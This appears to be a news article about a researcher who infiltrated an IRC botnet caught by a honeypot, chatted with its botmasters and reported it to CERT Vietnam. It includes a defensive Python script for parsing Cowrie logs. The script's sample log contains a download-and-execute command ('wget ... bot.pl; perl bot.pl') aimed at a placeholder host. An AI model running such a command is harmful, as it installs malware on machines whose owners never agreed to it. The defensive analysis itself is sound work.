A security researcher from CyberNews has succeeded in infiltrating an IRC botnet that tried to attack one of their honeypots. In a chat with the botmaster, the researcher tried to find out what the IRC botnet is used for and whether the cybercriminals who control it are involved in other activities. In the end, the botnet was reported to CERT Vietnam to have it shut down.
The security researcher noticed an attempt to download a malicious file to one of the computers connected to the CyberNews Cowrie honeypot. The malicious file contained a Perl script designed to infect the host machine and allow the attacker to execute remote commands on the system.
Infiltrating the Botnet IRC channel
The security researcher wanted to find out as much as possible about this old botnet and the cyber criminals behind it. Once enough data had been collected, the botnet was to be deactivated. The findings were to go to the responsible authorities. The security researcher began the investigation by connecting to the IRC server address found in the malicious file to see if the botnet server was still active.
Since this was the case, the security researcher infiltrated the IRC channel used for communication between the bots and the botmaster. The researcher found a working IRC botnet with no less than 137 compromised systems.
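The two steps described so far, spotting the download of the bot script in the Cowrie honeypot log and then pulling the IRC server address out of the captured file, can be scripted on the defender's side. The following Python is an added example, not code from CyberNews or from the Cowrie project: the Cowrie log lines and the Perl configuration snippet are constructed stand-ins (the hash, addresses and host names are placeholders), and the variable names the regexes look for ($server, $port, the channel list) are an assumption about how such scripts typically store their settings, not something taken from the actual sample.

```python
import json
import re
from typing import Dict, List

# Constructed sample of Cowrie JSON log lines (placeholder data, not a real capture).
# Field names follow Cowrie's JSON output: eventid, session, src_ip, url, outfile, shasum.
SAMPLE_COWRIE_LOG = """
{"eventid": "cowrie.session.connect", "session": "a1b2c3d4", "src_ip": "198.51.100.23", "timestamp": "2020-10-20T08:12:01Z"}
{"eventid": "cowrie.login.success", "session": "a1b2c3d4", "src_ip": "198.51.100.23", "username": "root", "password": "123456"}
{"eventid": "cowrie.command.input", "session": "a1b2c3d4", "src_ip": "198.51.100.23", "input": "cd /tmp; wget http://203.0.113.9/bot.pl; perl bot.pl"}
{"eventid": "cowrie.session.file_download", "session": "a1b2c3d4", "src_ip": "198.51.100.23", "url": "http://203.0.113.9/bot.pl", "outfile": "dl/PLACEHOLDER_SHA256", "shasum": "PLACEHOLDER_SHA256"}
{"eventid": "cowrie.session.closed", "session": "a1b2c3d4", "src_ip": "198.51.100.23"}
"""

# Constructed stand-in for the configuration block of a captured Perl IRC bot.
# Only the assignments an analyst would extract indicators from are shown.
SAMPLE_PAYLOAD = r"""
#!/usr/bin/perl
my $server = 'irc.example-c2.invalid';   # placeholder C2 host
my $port = '6667';
my @channels = ("#bots");
"""

# Assumed configuration patterns; real samples may name these variables differently.
SERVER_RE = re.compile(r"\$server\s*=\s*['\"]([^'\"]+)['\"]")
PORT_RE = re.compile(r"\$port\s*=\s*['\"]?(\d{2,5})['\"]?")
CHANNEL_RE = re.compile(r"['\"](#[A-Za-z0-9_\-]+)['\"]")


def parse_events(log_text: str) -> List[Dict]:
    """Parse Cowrie JSON lines, skipping blank or malformed entries."""
    events = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a truncated line should not abort the whole scan
    return events


def parse_downloads(log_text: str) -> List[Dict]:
    """Return every file download Cowrie recorded, joined with the shell
    commands of the same session that referenced the download URL."""
    events = parse_events(log_text)
    downloads = []
    for ev in events:
        if ev.get("eventid") != "cowrie.session.file_download":
            continue
        url = ev.get("url", "")
        commands = [
            e.get("input", "")
            for e in events
            if e.get("eventid") == "cowrie.command.input"
            and e.get("session") == ev.get("session")
            and url in e.get("input", "")
        ]
        downloads.append({
            "session": ev.get("session"),
            "src_ip": ev.get("src_ip"),
            "url": url,
            "shasum": ev.get("shasum"),
            "commands": commands,
        })
    return downloads


def extract_irc_indicators(payload_text: str) -> Dict:
    """Pull the IRC server, port and channel names out of a captured script
    so they can be checked (is the C2 still up?) and reported to a CERT."""
    server = SERVER_RE.search(payload_text)
    port = PORT_RE.search(payload_text)
    return {
        "server": server.group(1) if server else None,
        "port": int(port.group(1)) if port else None,
        "channels": sorted(set(CHANNEL_RE.findall(payload_text))),
    }


def build_report(log_text: str, payload_text: str) -> List[Dict]:
    """Combine honeypot download events with the indicators from the payload."""
    indicators = extract_irc_indicators(payload_text)
    return [dict(d, irc=indicators) for d in parse_downloads(log_text)]


if __name__ == "__main__":
    print(json.dumps(build_report(SAMPLE_COWRIE_LOG, SAMPLE_PAYLOAD), indent=2))
```

Running the script prints one report entry: the attacker's source IP and session, the download URL and hash, the command line that fetched and started the script, and the IRC server, port and channel extracted from it. Those are exactly the values a researcher needs before deciding whether the C2 server is still reachable and which CERT is responsible for it.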
Chat with the botmaster
Before the security researcher had the IRC botnet shut down, he tried to find out the botmasters’ motives: Why do they operate this botnet? Did they also carry out other criminal operations? The security researcher also wanted to know exactly what the botnet was used for. To get these answers, the researcher (BLUE) initiated a conversation with the botmaster (RED) via the IRC channel.
[Screenshot: Chat with the botmaster]
After some initial small talk, the researcher gradually began asking the botmaster about the purpose of the IRC botnet. The botmaster gave several answers, claiming to use the network for DDoS attacks as well as for “testing”, “backdoors” and “money”. After a short back and forth, the botmaster suggested that the researcher switch to Discord, presumably because he took the researcher for a fellow cybercriminal. Four users were active in the Discord channel. They had been informed beforehand that the new participant had intruded into the botnet’s IRC server.
The botmaster apparently also already knew that the malicious activity had been noticed in a honeypot. Soon after, the botmaster expressed his frustration that people often stumbled across their IRC server. The participants of the Discord channel further explained how they usually deal with such intruders by performing DDoS attacks against them.
As the chat session progressed, the botmasters’ ego seemed to grow with each additional question. Towards the end of the conversation, they claimed to have operated a botnet that spanned over 100,000 IoT devices, a very large botnet by today’s standards. With such a large botnet, they would be able to carry out large-scale DDoS attacks and launch massive spam campaigns.
When asked about their current activities, the botmasters said they were building networks with compromised devices and selling them to other cybercriminals for $3,000. This time, one of the botmasters even provided the proof in the form of a promotional video. During further investigation, the researcher discovered other videos on the botmaster’s YouTube channel that contained several advertisements of botnets for sale.
Finally, the botmaster claimed that they had 7,000 compromised IoT devices/bots in their current botnet and that the IRC botnet found by the researcher had been used for testing purposes only. When the security researcher asked the botmaster for an official interview and revealed his professional identity, the communication broke down.
The only remaining option was to report the IRC botnet to CERT in Vietnam, where the botnet’s command and control server was apparently located. CERT Vietnam was informed about the botnet on October 26, 2020. The country’s computer emergency response team is currently working to shut down the botmaster’s Command and Control server. Details can be read in this blog post.